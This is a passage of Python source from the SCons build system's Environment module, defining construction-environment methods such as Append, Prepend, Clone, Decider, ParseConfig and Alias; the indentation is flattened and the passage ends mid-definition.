if __debug__: logInstanceCreation(self, 'Environment.Base')
self._memo = {}
self.fs = SCons.Node.FS.get_default_fs()
self.ans = SCons.Node.Alias.default_ans
self.lookup_list = SCons.Node.arg2nodes_lookups
self._dict = semi_deepcopy(SCons.Defaults.ConstructionEnvironment)
self._init_special()
self.added_methods = []
# We don't use AddMethod, or define these as methods in this
# class, because we *don't* want these functions to be bound
# methods. They need to operate independently so that the
# settings will work properly regardless of whether a given
# target ends up being built with a Base environment or an
# OverrideEnvironment or what have you.
self.decide_target = default_decide_target
self.decide_source = default_decide_source
self.copy_from_cache = default_copy_from_cache
self._dict['BUILDERS'] = BuilderDict(self._dict['BUILDERS'], self)
if platform is None:
platform = self._dict.get('PLATFORM', None)
if platform is None:
platform = SCons.Platform.Platform()
if SCons.Util.is_String(platform):
platform = SCons.Platform.Platform(platform)
self._dict['PLATFORM'] = str(platform)
platform(self)
self._dict['HOST_OS'] = self._dict.get('HOST_OS',None)
self._dict['HOST_ARCH'] = self._dict.get('HOST_ARCH',None)
# Now set defaults for TARGET_{OS|ARCH}
self._dict['TARGET_OS'] = self._dict.get('HOST_OS',None)
self._dict['TARGET_ARCH'] = self._dict.get('HOST_ARCH',None)
# Apply the passed-in and customizable variables to the
# environment before calling the tools, because they may use
# some of them during initialization.
if 'options' in kw:
# Backwards compatibility: they may stll be using the
# old "options" keyword.
variables = kw['options']
del kw['options']
self.Replace(**kw)
keys = list(kw.keys())
if variables:
keys = keys + list(variables.keys())
variables.Update(self)
save = {}
for k in keys:
try:
save[k] = self._dict[k]
except KeyError:
# No value may have been set if they tried to pass in a
# reserved variable name like TARGETS.
pass
SCons.Tool.Initializers(self)
if tools is None:
tools = self._dict.get('TOOLS', None)
if tools is None:
tools = ['default']
apply_tools(self, tools, toolpath)
# Now restore the passed-in and customized variables
# to the environment, since the values the user set explicitly
# should override any values set by the tools.
for key, val in save.items():
self._dict[key] = val
# Finally, apply any flags to be merged in
if parse_flags: self.MergeFlags(parse_flags)
#######################################################################
# Utility methods that are primarily for internal use by SCons.
# These begin with lower-case letters.
#######################################################################
def get_builder(self, name):
"""Fetch the builder with the specified name from the environment.
"""
try:
return self._dict['BUILDERS'][name]
except KeyError:
return None
def get_CacheDir(self):
try:
path = self._CacheDir_path
except AttributeError:
path = SCons.Defaults.DefaultEnvironment()._CacheDir_path
try:
if path == self._last_CacheDir_path:
return self._last_CacheDir
except AttributeError:
pass
cd = SCons.CacheDir.CacheDir(path)
self._last_CacheDir_path = path
self._last_CacheDir = cd
return cd
def get_factory(self, factory, default='File'):
"""Return a factory function for creating Nodes for this
construction environment.
"""
name = default
try:
is_node = issubclass(factory, SCons.Node.FS.Base)
except TypeError:
# The specified factory isn't a Node itself--it's
# most likely None, or possibly a callable.
pass
else:
if is_node:
# The specified factory is a Node (sub)class. Try to
# return the FS method that corresponds to the Node's
# name--that is, we return self.fs.Dir if they want a Dir,
# self.fs.File for a File, etc.
try: name = factory.__name__
except AttributeError: pass
else: factory = None
if not factory:
# They passed us None, or we picked up a name from a specified
# class, so return the FS method. (Note that we *don't*
# use our own self.{Dir,File} methods because that would
# cause env.subst() to be called twice on the file name,
# interfering with files that have $$ in them.)
factory = getattr(self.fs, name)
return factory
memoizer_counters.append(SCons.Memoize.CountValue('_gsm'))
def _gsm(self):
try:
return self._memo['_gsm']
except KeyError:
pass
result = {}
try:
scanners = self._dict['SCANNERS']
except KeyError:
pass
else:
# Reverse the scanner list so that, if multiple scanners
# claim they can scan the same suffix, earlier scanners
# in the list will overwrite later scanners, so that
# the result looks like a "first match" to the user.
if not SCons.Util.is_List(scanners):
scanners = [scanners]
else:
scanners = scanners[:] # copy so reverse() doesn't mod original
scanners.reverse()
for scanner in scanners:
for k in scanner.get_skeys(self):
if k and self['PLATFORM'] == 'win32':
k = k.lower()
result[k] = scanner
self._memo['_gsm'] = result
return result
def get_scanner(self, skey):
"""Find the appropriate scanner given a key (usually a file suffix).
"""
if skey and self['PLATFORM'] == 'win32':
skey = skey.lower()
return self._gsm().get(skey)
def scanner_map_delete(self, kw=None):
"""Delete the cached scanner map (if we need to).
"""
try:
del self._memo['_gsm']
except KeyError:
pass
def _update(self, dict):
"""Update an environment's values directly, bypassing the normal
checks that occur when users try to set items.
"""
self._dict.update(dict)
def get_src_sig_type(self):
try:
return self.src_sig_type
except AttributeError:
t = SCons.Defaults.DefaultEnvironment().src_sig_type
self.src_sig_type = t
return t
def get_tgt_sig_type(self):
try:
return self.tgt_sig_type
except AttributeError:
t = SCons.Defaults.DefaultEnvironment().tgt_sig_type
self.tgt_sig_type = t
return t
#######################################################################
# Public methods for manipulating an Environment. These begin with
# upper-case letters. The essential characteristic of methods in
# this section is that they do *not* have corresponding same-named
# global functions. For example, a stand-alone Append() function
# makes no sense, because Append() is all about appending values to
# an Environment's construction variables.
#######################################################################
def Append(self, **kw):
"""Append values to existing construction variables
in an Environment.
"""
kw = copy_non_reserved_keywords(kw)
for key, val in kw.items():
# It would be easier on the eyes to write this using
# "continue" statements whenever we finish processing an item,
# but Python 1.5.2 apparently doesn't let you use "continue"
# within try:-except: blocks, so we have to nest our code.
try:
orig = self._dict[key]
except KeyError:
# No existing variable in the environment, so just set
# it to the new value.
self._dict[key] = val
else:
try:
# Check if the original looks like a dictionary.
# If it is, we can't just try adding the value because
# dictionaries don't have __add__() methods, and
# things like UserList will incorrectly coerce the
# original dict to a list (which we don't want).
update_dict = orig.update
except AttributeError:
try:
# Most straightforward: just try to add them
# together. This will work in most cases, when the
# original and new values are of compatible types.
self._dict[key] = orig + val
except (KeyError, TypeError):
try:
# Check if the original is a list.
add_to_orig = orig.append
except AttributeError:
# The original isn't a list, but the new
# value is (by process of elimination),
# so insert the original in the new value
# (if there's one to insert) and replace
# the variable with it.
if orig:
val.insert(0, orig)
self._dict[key] = val
else:
# The original is a list, so append the new
# value to it (if there's a value to append).
if val:
add_to_orig(val)
else:
# The original looks like a dictionary, so update it
# based on what we think the value looks like.
if SCons.Util.is_List(val):
for v in val:
orig[v] = None
else:
try:
update_dict(val)
except (AttributeError, TypeError, ValueError):
if SCons.Util.is_Dict(val):
for k, v in val.items():
orig[k] = v
else:
orig[val] = None
self.scanner_map_delete(kw)
# allow Dirs and strings beginning with # for top-relative
# Note this uses the current env's fs (in self).
def _canonicalize(self, path):
if not SCons.Util.is_String(path): # typically a Dir
path = str(path)
if path and path[0] == '#':
path = str(self.fs.Dir(path))
return path
def AppendENVPath(self, name, newpath, envname = 'ENV',
sep = os.pathsep, delete_existing=1):
"""Append path elements to the path 'name' in the 'ENV'
dictionary for this environment. Will only add any particular
path once, and will normpath and normcase all paths to help
assure this. This can also handle the case where the env
variable is a list instead of a string.
If delete_existing is 0, a newpath which is already in the path
will not be moved to the end (it will be left where it is).
"""
orig = ''
if envname in self._dict and name in self._dict[envname]:
orig = self._dict[envname][name]
nv = SCons.Util.AppendPath(orig, newpath, sep, delete_existing,
canonicalize=self._canonicalize)
if envname not in self._dict:
self._dict[envname] = {}
self._dict[envname][name] = nv
def AppendUnique(self, delete_existing=0, **kw):
"""Append values to existing construction variables
in an Environment, if they're not already there.
If delete_existing is 1, removes existing values first, so
values move to end.
"""
kw = copy_non_reserved_keywords(kw)
for key, val in kw.items():
if SCons.Util.is_List(val):
val = _delete_duplicates(val, delete_existing)
if key not in self._dict or self._dict[key] in ('', None):
self._dict[key] = val
elif SCons.Util.is_Dict(self._dict[key]) and \
SCons.Util.is_Dict(val):
self._dict[key].update(val)
elif SCons.Util.is_List(val):
dk = self._dict[key]
if not SCons.Util.is_List(dk):
dk = [dk]
if delete_existing:
dk = [x for x in dk if x not in val]
else:
val = [x for x in val if x not in dk]
self._dict[key] = dk + val
else:
dk = self._dict[key]
if SCons.Util.is_List(dk):
# By elimination, val is not a list. Since dk is a
# list, wrap val in a list first.
if delete_existing:
dk = [x for x in dk if x not in val]
self._dict[key] = dk + [val]
else:
if not val in dk:
self._dict[key] = dk + [val]
else:
if delete_existing:
dk = [x for x in dk if x not in val]
self._dict[key] = dk + val
self.scanner_map_delete(kw)
def Clone(self, tools=[], toolpath=None, parse_flags = None, **kw):
"""Return a copy of a construction Environment. The
copy is like a Python "deep copy"--that is, independent
copies are made recursively of each objects--except that
a reference is copied when an object is not deep-copyable
(like a function). There are no references to any mutable
objects in the original Environment.
"""
clone = copy.copy(self)
clone._dict = semi_deepcopy(self._dict)
try:
cbd = clone._dict['BUILDERS']
except KeyError:
pass
else:
clone._dict['BUILDERS'] = BuilderDict(cbd, clone)
# Check the methods added via AddMethod() and re-bind them to
# the cloned environment. Only do this if the attribute hasn't
# been overwritten by the user explicitly and still points to
# the added method.
clone.added_methods = []
for mw in self.added_methods:
if mw == getattr(self, mw.name):
clone.added_methods.append(mw.clone(clone))
clone._memo = {}
# Apply passed-in variables before the tools
# so the tools can use the new variables
kw = copy_non_reserved_keywords(kw)
new = {}
for key, value in kw.items():
new[key] = SCons.Subst.scons_subst_once(value, self, key)
clone.Replace(**new)
apply_tools(clone, tools, toolpath)
# apply them again in case the tools overwrote them
clone.Replace(**new)
# Finally, apply any flags to be merged in
if parse_flags: clone.MergeFlags(parse_flags)
if __debug__: logInstanceCreation(self, 'Environment.EnvironmentClone')
return clone
def Copy(self, *args, **kw):
global _warn_copy_deprecated
if _warn_copy_deprecated:
msg = "The env.Copy() method is deprecated; use the env.Clone() method instead."
SCons.Warnings.warn(SCons.Warnings.DeprecatedCopyWarning, msg)
_warn_copy_deprecated = False
return self.Clone(*args, **kw)
def _changed_build(self, dependency, target, prev_ni):
if dependency.changed_state(target, prev_ni):
return 1
return self.decide_source(dependency, target, prev_ni)
def _changed_content(self, dependency, target, prev_ni):
return dependency.changed_content(target, prev_ni)
def _changed_source(self, dependency, target, prev_ni):
target_env = dependency.get_build_env()
type = target_env.get_tgt_sig_type()
if type == 'source':
return target_env.decide_source(dependency, target, prev_ni)
else:
return target_env.decide_target(dependency, target, prev_ni)
def _changed_timestamp_then_content(self, dependency, target, prev_ni):
return dependency.changed_timestamp_then_content(target, prev_ni)
def _changed_timestamp_newer(self, dependency, target, prev_ni):
return dependency.changed_timestamp_newer(target, prev_ni)
def _changed_timestamp_match(self, dependency, target, prev_ni):
return dependency.changed_timestamp_match(target, prev_ni)
def _copy_from_cache(self, src, dst):
return self.fs.copy(src, dst)
def _copy2_from_cache(self, src, dst):
return self.fs.copy2(src, dst)
def Decider(self, function):
copy_function = self._copy2_from_cache
if function in ('MD5', 'content'):
if not SCons.Util.md5:
raise UserError("MD5 signatures are not available in this version of Python.")
function = self._changed_content
elif function == 'MD5-timestamp':
function = self._changed_timestamp_then_content
elif function in ('timestamp-newer', 'make'):
function = self._changed_timestamp_newer
copy_function = self._copy_from_cache
elif function == 'timestamp-match':
function = self._changed_timestamp_match
elif not callable(function):
raise UserError("Unknown Decider value %s" % repr(function))
# We don't use AddMethod because we don't want to turn the
# function, which only expects three arguments, into a bound
# method, which would add self as an initial, fourth argument.
self.decide_target = function
self.decide_source = function
self.copy_from_cache = copy_function
def Detect(self, progs):
"""Return the first available program in progs.
"""
if not SCons.Util.is_List(progs):
progs = [ progs ]
for prog in progs:
path = self.WhereIs(prog)
if path: return prog
return None
def Dictionary(self, *args):
if not args:
return self._dict
dlist = [self._dict[x] for x in args]
if len(dlist) == 1:
dlist = dlist[0]
return dlist
def Dump(self, key = None):
"""
Using the standard Python pretty printer, dump the contents of the
scons build environment to stdout.
If the key passed in is anything other than None, then that will
be used as an index into the build environment dictionary and
whatever is found there will be fed into the pretty printer. Note
that this key is case sensitive.
"""
import pprint
pp = pprint.PrettyPrinter(indent=2)
if key:
dict = self.Dictionary(key)
else:
dict = self.Dictionary()
return pp.pformat(dict)
def FindIxes(self, paths, prefix, suffix):
"""
Search a list of paths for something that matches the prefix and suffix.
paths - the list of paths or nodes.
prefix - construction variable for the prefix.
suffix - construction variable for the suffix.
"""
suffix = self.subst('$'+suffix)
prefix = self.subst('$'+prefix)
for path in paths:
dir,name = os.path.split(str(path))
if name[:len(prefix)] == prefix and name[-len(suffix):] == suffix:
return path
def ParseConfig(self, command, function=None, unique=1):
"""
Use the specified function to parse the output of the command
in order to modify the current environment. The 'command' can
be a string or a list of strings representing a command and
its arguments. 'Function' is an optional argument that takes
the environment, the output of the command, and the unique flag.
If no function is specified, MergeFlags, which treats the output
as the result of a typical 'X-config' command (i.e. gtk-config),
will merge the output into the appropriate variables.
"""
if function is None:
def parse_conf(env, cmd, unique=unique):
return env.MergeFlags(cmd, unique)
function = parse_conf
if SCons.Util.is_List(command):
command = ' '.join(command)
command = self.subst(command)
return function(self, self.backtick(command))
def ParseDepends(self, filename, must_exist=None, only_one=0):
"""
Parse a mkdep-style file for explicit dependencies. This is
completely abusable, and should be unnecessary in the "normal"
case of proper SCons configuration, but it may help make
the transition from a Make hierarchy easier for some people
to swallow. It can also be genuinely useful when using a tool
that can write a .d file, but for which writing a scanner would
be too complicated.
"""
filename = self.subst(filename)
try:
fp = open(filename, 'r')
except IOError:
if must_exist:
raise
return
lines = SCons.Util.LogicalLines(fp).readlines()
lines = [l for l in lines if l[0] != '#']
tdlist = []
for line in lines:
try:
target, depends = line.split(':', 1)
except (AttributeError, ValueError):
# Throws AttributeError if line isn't a string. Can throw
# ValueError if line doesn't split into two or more elements.
pass
else:
tdlist.append((target.split(), depends.split()))
if only_one:
targets = []
for td in tdlist:
targets.extend(td[0])
if len(targets) > 1:
raise SCons.Errors.UserError(
"More than one dependency target found in `%s': %s"
% (filename, targets))
for target, depends in tdlist:
self.Depends(target, depends)
def Platform(self, platform):
platform = self.subst(platform)
return SCons.Platform.Platform(platform)(self)
def Prepend(self, **kw):
"""Prepend values to existing construction variables
in an Environment.
"""
kw = copy_non_reserved_keywords(kw)
for key, val in kw.items():
# It would be easier on the eyes to write this using
# "continue" statements whenever we finish processing an item,
# but Python 1.5.2 apparently doesn't let you use "continue"
# within try:-except: blocks, so we have to nest our code.
try:
orig = self._dict[key]
except KeyError:
# No existing variable in the environment, so just set
# it to the new value.
self._dict[key] = val
else:
try:
# Check if the original looks like a dictionary.
# If it is, we can't just try adding the value because
# dictionaries don't have __add__() methods, and
# things like UserList will incorrectly coerce the
# original dict to a list (which we don't want).
update_dict = orig.update
except AttributeError:
try:
# Most straightforward: just try to add them
# together. This will work in most cases, when the
# original and new values are of compatible types.
self._dict[key] = val + orig
except (KeyError, TypeError):
try:
# Check if the added value is a list.
add_to_val = val.append
except AttributeError:
# The added value isn't a list, but the
# original is (by process of elimination),
# so insert the the new value in the original
# (if there's one to insert).
if val:
orig.insert(0, val)
else:
# The added value is a list, so append
# the original to it (if there's a value
# to append).
if orig:
add_to_val(orig)
self._dict[key] = val
else:
# The original looks like a dictionary, so update it
# based on what we think the value looks like.
if SCons.Util.is_List(val):
for v in val:
orig[v] = None
else:
try:
update_dict(val)
except (AttributeError, TypeError, ValueError):
if SCons.Util.is_Dict(val):
for k, v in val.items():
orig[k] = v
else:
orig[val] = None
self.scanner_map_delete(kw)
def PrependENVPath(self, name, newpath, envname = 'ENV', sep = os.pathsep,
delete_existing=1):
"""Prepend path elements to the path 'name' in the 'ENV'
dictionary for this environment. Will only add any particular
path once, and will normpath and normcase all paths to help
assure this. This can also handle the case where the env
variable is a list instead of a string.
If delete_existing is 0, a newpath which is already in the path
will not be moved to the front (it will be left where it is).
"""
orig = ''
if envname in self._dict and name in self._dict[envname]:
orig = self._dict[envname][name]
nv = SCons.Util.PrependPath(orig, newpath, sep, delete_existing,
canonicalize=self._canonicalize)
if envname not in self._dict:
self._dict[envname] = {}
self._dict[envname][name] = nv
def PrependUnique(self, delete_existing=0, **kw):
"""Prepend values to existing construction variables
in an Environment, if they're not already there.
If delete_existing is 1, removes existing values first, so
values move to front.
"""
kw = copy_non_reserved_keywords(kw)
for key, val in kw.items():
if SCons.Util.is_List(val):
val = _delete_duplicates(val, not delete_existing)
if key not in self._dict or self._dict[key] in ('', None):
self._dict[key] = val
elif SCons.Util.is_Dict(self._dict[key]) and \
SCons.Util.is_Dict(val):
self._dict[key].update(val)
elif SCons.Util.is_List(val):
dk = self._dict[key]
if not SCons.Util.is_List(dk):
dk = [dk]
if delete_existing:
dk = [x for x in dk if x not in val]
else:
val = [x for x in val if x not in dk]
self._dict[key] = val + dk
else:
dk = self._dict[key]
if SCons.Util.is_List(dk):
# By elimination, val is not a list. Since dk is a
# list, wrap val in a list first.
if delete_existing:
dk = [x for x in dk if x not in val]
self._dict[key] = [val] + dk
else:
if not val in dk:
self._dict[key] = [val] + dk
else:
if delete_existing:
dk = [x for x in dk if x not in val]
self._dict[key] = val + dk
self.scanner_map_delete(kw)
def Replace(self, **kw):
"""Replace existing construction variables in an Environment
with new construction variables and/or values.
"""
try:
kwbd = kw['BUILDERS']
except KeyError:
pass
else:
kwbd = semi_deepcopy(kwbd)
del kw['BUILDERS']
self.__setitem__('BUILDERS', kwbd)
kw = copy_non_reserved_keywords(kw)
self._update(semi_deepcopy(kw))
self.scanner_map_delete(kw)
def ReplaceIxes(self, path, old_prefix, old_suffix, new_prefix, new_suffix):
"""
Replace old_prefix with new_prefix and old_suffix with new_suffix.
env - Environment used to interpolate variables.
path - the path that will be modified.
old_prefix - construction variable for the old prefix.
old_suffix - construction variable for the old suffix.
new_prefix - construction variable for the new prefix.
new_suffix - construction variable for the new suffix.
"""
old_prefix = self.subst('$'+old_prefix)
old_suffix = self.subst('$'+old_suffix)
new_prefix = self.subst('$'+new_prefix)
new_suffix = self.subst('$'+new_suffix)
dir,name = os.path.split(str(path))
if name[:len(old_prefix)] == old_prefix:
name = name[len(old_prefix):]
if name[-len(old_suffix):] == old_suffix:
name = name[:-len(old_suffix)]
return os.path.join(dir, new_prefix+name+new_suffix)
def SetDefault(self, **kw):
for k in kw.keys():
if k in self._dict:
del kw[k]
self.Replace(**kw)
def _find_toolpath_dir(self, tp):
return self.fs.Dir(self.subst(tp)).srcnode().abspath
def Tool(self, tool, toolpath=None, **kw):
if SCons.Util.is_String(tool):
tool = self.subst(tool)
if toolpath is None:
toolpath = self.get('toolpath', [])
toolpath = list(map(self._find_toolpath_dir, toolpath))
tool = SCons.Tool.Tool(tool, toolpath, **kw)
tool(self)
def WhereIs(self, prog, path=None, pathext=None, reject=[]):
"""Find prog in the path.
"""
if path is None:
try:
path = self['ENV']['PATH']
except KeyError:
pass
elif SCons.Util.is_String(path):
path = self.subst(path)
if pathext is None:
try:
pathext = self['ENV']['PATHEXT']
except KeyError:
pass
elif SCons.Util.is_String(pathext):
pathext = self.subst(pathext)
prog = self.subst(prog)
path = SCons.Util.WhereIs(prog, path, pathext, reject)
if path: return path
return None
#######################################################################
# Public methods for doing real "SCons stuff" (manipulating
# dependencies, setting attributes on targets, etc.). These begin
# with upper-case letters. The essential characteristic of methods
# in this section is that they all *should* have corresponding
# same-named global functions.
#######################################################################
def Action(self, *args, **kw):
def subst_string(a, self=self):
if SCons.Util.is_String(a):
a = self.subst(a)
return a
nargs = list(map(subst_string, args))
nkw = self.subst_kw(kw)
return SCons.Action.Action(*nargs, **nkw)
def AddPreAction(self, files, action):
nodes = self.arg2nodes(files, self.fs.Entry)
action = SCons.Action.Action(action)
uniq = {}
for executor in [n.get_executor() for n in nodes]:
uniq[executor] = 1
for executor in uniq.keys():
executor.add_pre_action(action)
return nodes
def AddPostAction(self, files, action):
nodes = self.arg2nodes(files, self.fs.Entry)
action = SCons.Action.Action(action)
uniq = {}
for executor in [n.get_executor() for n in nodes]:
uniq[executor] = 1
for executor in uniq.keys():
executor.add_post_action(action)
return nodes
def Alias(self, target, source=[], action=None, **kw):
tlist = self.arg2nodes(target, self.ans.Alias)
if not SCons.Util.is_List(source):
source = [source]
source = [_f for _f in source if _f]
if not action:
if not source:
# There are no source files and no action, so just
# return a target list of classic Alias Nodes, without
# any builder. The externally visible effect is that
# this will make the wrapping Script.BuildTask class
# say that there's "Nothing to be done" for this Alias,
# instead of that it's "up to date."
return tlist
# No action, but there are sources. Re-call all the target
# builders to add the sources to each target.
result = []
for t in tlist:
bld = t.get_builder(AliasBuilder)
result.extend(bld(self, t, source))
return result
nkw = self.subst_kw(kw)
nkw.update({
'action' : SCons.Action.Action(action),
'source_factory' : self.fs.Entry,
'multi' : 1,
'is_explicit' : None,
})
bld = SCons.Builder.Builder(**nkw)
# Apply the Builder separately to each target so that the Aliases
# stay separate. If we did one "normal" Builder call with the
# whole target list, then all of the target Aliases would be
# associated under a single Executor.
result = []
for t in tlist:
# Calling the convert() method will cause a new Executor to be
# created from scratch, so we have to explicitly initialize
# it with the target's existing sources, plus our new ones,
# so nothing gets lost.
b = t.get_builder()
if b is None or b is AliasBuilder:
b = bld
else:
nkw['action'] = b.action + action
b = SCons.Builder.Builder(**nkw)
t.convert()
result.extend(b(self, t, t.sources + source))
return result
def AlwaysBuild(self, *targets):
tlist = []
for t in targets:
tlist.extend(self.arg2nodes(t, self.fs.Entry))
for t in tlist:
t.set_always_build()
return tlist
def BuildDir(self, *args, **kw):
msg = """BuildDir() and the build_dir keyword have been deprecated;\n\tuse VariantDir() and the variant_dir keyword instead."""
SCons.Warnings.warn(SCons.Warnings.DeprecatedBuildDirWarning, msg)
if 'build_dir' in kw:
kw['variant_dir'] = kw['build_dir']
del kw['build_dir']
return self.VariantDir(*args, **kw)
def Builder(self, **kw):
nkw = self.subst_kw(kw)
return SCons.Builder.Builder(**nkw)
def CacheDir(self, path):
import SCons.CacheDir
if path is not None:
path = self.subst(path)
self._CacheDir_path = path
def Clean(self, targets, files):
global CleanTargets
tlist = self.arg2nodes(targets, self.fs.Entry)
flist = self.arg2nodes(files, self.fs.Entry)
for t in tlist:
try:
CleanTargets[t].extend(flist)
except KeyError:
CleanTargets[t] = flist
def Configure(self, *args, **kw):
nargs = [self]
if args:
nargs = nargs + self.subst_list(args)[0]
nkw = self.subst_kw(kw)
nkw['_depth'] = kw.get('_depth', 0) + 1
try:
nkw['custom_tests'] = self.subst_kw(nkw['custom_tests'])
except KeyError:
pass
return SCons.SConf.SConf(*nargs, **nkw)
def Command(self, target, source, action, **kw):
"""Builds the supplied target files from the supplied
source files using the supplied action. Action may
be any type that the Builder constructor will accept
for an action."""
bkw = {
'action' : action,
'target_factory' : self.fs.Entry,
'source_factory' : self.fs.Entry,
}
try: bkw['source_scanner'] = kw['source_scanner']
except KeyError: pass
else: del kw['source_scanner']
bld = SCons.Builder.Builder(**bkw)
return bld(self, target, source, **kw)
def Depends(self, target, dependency):
"""Explicity specify that 'target's depend on 'dependency'."""
tlist = self.arg2nodes(target, self.fs.Entry)
dlist = self.arg2nodes(dependency, self.fs.Entry)
for t in tlist:
t.add_dependency(dlist)
return tlist
def Dir(self, name, *args, **kw):
"""
"""
s = self.subst(name)
if SCons.Util.is_Sequence(s):
result=[]
for e in s:
result.append(self.fs.Dir(e, *args, **kw))
return result
return self.fs.Dir(s, *args, **kw)
def NoClean(self, *targets):
"""Tags a target so that it will not be cleaned by -c"""
tlist = []
for t in targets:
tlist.extend(self.arg2nodes(t, self.fs.Entry))
for t in tlist:
t.set_noclean()
return tlist
def NoCache(self, *targets):
"""Tags a target so that it will not be cached"""
tlist = []
for t in targets:
tlist.extend(self.arg2nodes(t, self.fs.Entry))
for t in tlist:
t.set_nocache()
return tlist
def Entry(self, name, *args, **kw):
"""
"""
s = self.subst(name)
if SCons.Util.is_Sequence(s):
result=[]
for e in s:
result.append(self.fs.Entry(e, *args, **kw))
return result
return self.fs.Entry(s, *args, **kw)
def Environment(self, **kw):
return SCons.Environment.Environment(**self.subst_kw(kw))
def Execute(self, action, *args, **kw):
"""Directly execute an action through an Environment
"""
action = self.Action(action, *args, **kw)
result = action([], [], self)
if isinstance(result, SCons.Errors.BuildError):
errstr = result.errstr
if result.filename:
errstr = result.filename + ': ' + errstr
sys.stderr.write("scons: *** %s\n" % errstr)
return result.status
else:
return result
def File(self, name, *args, **kw):
"""
"""
s = self.subst(name)
if SCons.Util.is_Sequence(s):
result=[]
for e in s:
result.append(self.fs.File(e, *args, **kw))
return result
return self.fs.File(s, *args, **kw)
def FindFile(self, file, dirs):
file = self.subst(file)
nodes = self.arg2nodes(dirs, self.fs.Dir)
return SCons.Node.FS.find_file(file, tuple(nodes))
def Flatten(self, sequence):
return SCons.Util.flatten(sequence)
def GetBuildPath(self, files):
result = list(map(str, self.arg2nodes(files, self.fs.Entry)))
if SCons.Util.is_List(files):
return result
else:
return result[0]
def Glob(self, pattern, ondisk=True, source=False, strings=False):
return self.fs.Glob(self.subst(pattern), ondisk, source, strings)
def Ignore(self, target, dependency):
"""Ignore a dependency."""
tlist = self.arg2nodes(target, self.fs.Entry)
dlist = self.arg2nodes(dependency, self.fs.Entry)
for t in tlist:
t.add_ignore(dlist)
return tlist
def Literal(self, string):
return SCons.Subst.Literal(string)
def Local(self, *targets):
ret = []
for targ in targets:
if isinstance(targ, SCons.Node.Node):
targ.set_local()
ret.append(targ)
else:
for t in self.arg2nodes(targ, self.fs.Entry):
t.set_local()
ret.append(t)
return ret
def Precious(self, *targets):
tlist = []
for t in targets:
tlist.extend(self.arg2nodes(t, self.fs.Entry))
for t in tlist:
t.set_precious()
return tlist
def Repository(self, *dirs, **kw):
dirs = self.arg2nodes(list(dirs), self.fs.Dir)
self.fs.Repository(*dirs, **kw)
def Requires(self, target, prerequisite):
"""Specify that 'prerequisite' must be built before 'target',
(but 'target' does not actually depend on 'prerequisite'
and need not be rebuilt if it changes)."""
tlist = self.arg2nodes(target, self.fs.Entry)
plist = self.arg2nodes(prerequisite, self.fs.Entry)
for t in tlist:
t.add_prerequisite(plist)
return tlist
def Scanner(self, *args, **kw):
nargs = []
for arg in args:
if SCons.Util.is_String(arg):
arg = self.subst(arg)
nargs.append(arg)
nkw = self.subst_kw(kw)
return SCons.Scanner.Base(*nargs, **nkw)
def SConsignFile(self, name=".sconsign", dbm_module=None):
if name is not None:
name = self.subst(name)
if not os.path.isabs(name):
name = os.path.join(str(self.fs.SConstruct_dir), name)
if name:
name = os.path.normpath(name)
sconsign_dir = os.path.dirname(name)
if sconsign_dir and not os.path.exists(sconsign_dir):
self.Execute(SCons.Defaults.Mkdir(sconsign_dir))
SCons.SConsign.File(name, dbm_module)
def SideEffect(self, side_effect, target):
"""Tell scons that side_effects are built as side
effects of building targets."""
side_effects = self.arg2nodes(side_effect, self.fs.Entry)
targets = self.arg2nodes(target, self.fs.Entry)
for side_effect in side_effects:
if side_effect.multiple_side_effect_has_builder():
raise SCons.Errors.UserError("Multiple ways to build the same target were specified for: %s" % str(side_effect))
side_effect.add_source(targets)
side_effect.side_effect = 1
self.Precious(side_effect)
for target in targets:
target.side_effects.append(side_effect)
return side_effects
def SourceCode(self, entry, builder):
"""Arrange for a source code builder for (part of) a tree."""
msg = """SourceCode() has been deprecated and there is no replacement.
\tIf you need this function, please contact [email protected]."""
SCons.Warnings.warn(SCons.Warnings.DeprecatedSourceCodeWarning, msg)
entries = self.arg2nodes(entry, self.fs.Entry)
for entry in entries:
entry.set_src_builder(builder)
return entries
def SourceSignatures(self, type):
global _warn_source_signatures_deprecated
if _warn_source_signatures_deprecated:
msg = "The env.SourceSignatures() method is deprecated;\n" + \
"\tconvert your build to use the env.Decider() method instead."
SCons.Warnings.warn(SCons.Warnings.DeprecatedSourceSignaturesWarning, msg)
_warn_source_signatures_deprecated = False
type = self.subst(type)
self.src_sig_type = type
if type == 'MD5':
if not SCons.Util.md5:
raise UserError("MD5 signatures are not available in this version of Python.")
self.decide_source = self._changed_content
elif type == 'timestamp':
self.decide_source = self._changed_timestamp_match
else:
raise UserError("Unknown source signature type '%s'" % type)
def Split(self, arg):
"""This function converts a string or list into a list of strings
or Nodes. This makes things easier for users by allowing files to
be specified as a white-space separated list to be split.
The input rules are:
- A single string containing names separated by spaces. These will be
split apart at the spaces.
- A single Node instance
- A list containing either strings or Node instances. Any strings
in the list are not split at spaces.
In all cases, the function returns a list of Nodes and strings."""
if SCons.Util.is_List(arg):
return list(map(self.subst, arg))
elif SCons.Util.is_String(arg):
return self.subst(arg).split()
else:
return [self.subst(arg)]
def TargetSignatures(self, type):
global _warn_target_signatures_deprecated
if _warn_target_signatures_deprecated:
msg = "The env.TargetSignatures() method is deprecated;\n" + \
"\tconvert your build to use the env.Decider() method instead."
SCons.Warnings.warn(SCons.Warnings.DeprecatedTargetSignaturesWarning, msg)
_warn_target_signatures_deprecated = False
type = self.subst(type)
self.tgt_sig_type = type
if type in ('MD5', 'content'):
if not SCons.Util.md5:
raise UserError("MD5 signatures are not available in this version of Python.")
self.decide_target = self._changed_content
elif type == 'timestamp':
self.decide_target = self._changed_timestamp_match
elif type == 'build':
self.decide_target = self._changed_build
elif type == 'source':
self.decide_target = self._changed_source
else:
raise UserError("Unknown target signature type '%s'"%type)
def Value(self, value, built_value=None):
"""
"""
return SCons.Node.Python.Value(value, built_value)
def VariantDir(self, variant_dir, src_dir, duplicate=1):
variant_dir = self.arg2nodes(variant_dir, self.fs.Dir)[0]
src_dir = self.arg2nodes(src_dir, self.fs.Dir)[0]
self.fs.VariantDir(variant_dir, src_dir, duplicate)
def FindSourceFiles(self, node='.'):
""" returns a list of all source files.
"""
node = self.arg2nodes(node, self.fs.Entry)[0]
sources = []
def build_source(ss):
for s in ss:
if isinstance(s, SCons.Node.FS.Dir):
build_source(s.all_children())
elif s.has_builder():
build_source(s.sources)
elif isinstance(s.disambiguate(), SCons.Node.FS.File):
sources.append(s)
build_source(node.all_children())
# THIS CODE APPEARS TO HAVE NO EFFECT
# # get the final srcnode for all nodes, this means stripping any
# # attached build node by calling the srcnode function
# for file in sources:
# srcnode = file.srcnode()
# while srcnode != file.srcnode():
# srcnode = file.srcnode()
# remove duplicates
return list(set(sources))
def FindInstalledFiles(self):
